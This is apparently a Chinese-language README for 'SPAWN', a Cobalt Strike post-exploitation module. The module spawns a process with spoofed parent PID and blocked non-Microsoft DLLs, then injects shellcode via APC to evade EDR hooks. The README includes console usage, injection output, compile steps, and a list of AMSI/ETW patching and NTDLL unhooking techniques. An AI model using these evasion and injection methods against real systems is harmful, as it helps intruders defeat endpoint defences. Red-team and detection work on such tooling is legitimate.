SPAWN - Cobalt Strike BOF

Cobalt Strike BOF 產生一個犧牲進程，用 shellcode 注入它，并執行有效載荷。旨在通過使用任意代碼保護 (ACG)、BlockDll 和 PPID 欺騙生成犧牲進程來逃避 EDR/UserLand 鉤子。

功能

• 使用任意代碼保護 (ACG) 生成犧牲進程，以防止 EDR 解決方案掛接到犧牲進程 DLL 中。
• 注入并執行shellcode。

來自 ACG Protected Process 的 Popin' Calc

beacon> spawn notepad.exe 6248 /Users/bobby.cooke/git/boku7/SPAWN/popCalc.bin
[*] SPAWN (Bobby Cooke//SpiderLabs|@0xBoku|github.com/boku7)
[+] Opened handle 0x534 to process 6248(PID)
[+] Spawned process: notepad.exe | PID: 8404 | PPID: 6248
[+] Allocated RE memory in remote process 8404 (PID) at: 0x00000177A72C0000
[+] Wrote 280 bytes to memory in remote process 8404 (PID) at 0x00000177A72C0000
[+] APC queued for main thread of 8404 (PID) to shellcode address 0x00000177A72C0000

• CNA Agressor 腳本接口

beacon> help
    spawn                     Spawn a process with a spoofed PPID and blockDll
beacon> help spawn
Synopsis: spawn /path/to/exe PPID
beacon> ps
8264  5536  OneDrive.exe                 x86   1           DESKTOP-KOSR2NO\boku 
beacon> spawn cmd.exe 8264
[*] SPAWN (@0xBoku|github.com/boku7)
Opened handle 0x634 to process 8264(PID)
Success! Spawned process: cmd.exe | PID: 5384 | PPID: 8264

• PPID欺騙
• Cobalt Strikeblockdll功能

使用 x64 MinGW 編譯：

x86_64-w64-mingw32-gcc -c spawn.x64.c -o spawn.x64.o

從 Cobalt Strike Beacon 控制臺運行

• 編譯后將 spawn.cna 腳本導入 Cobalt Strikes Script Manager

beacon> spawn /path/to/exe PPID /local/path/to/shellcode.bin

cmd.exe進程與 PPID 一起生成為OneDrive.exe

• 我們看到了父子進程關系，并且我們生成的進程是用 Signatures restricted (Microsoft only)
• 這Signatures restricted (Microsoft only)使得未由 Microsoft 簽名的 DLL 無法加載到我們生成的進程中

構建遠程進程修補的不同方法

• NTDLL.DLL 遠程進程脫鉤
• ETW 遠程進程修補/繞過
• AMSI 遠程進程修補/繞過
• CLR 加載和 .Net 程序集注入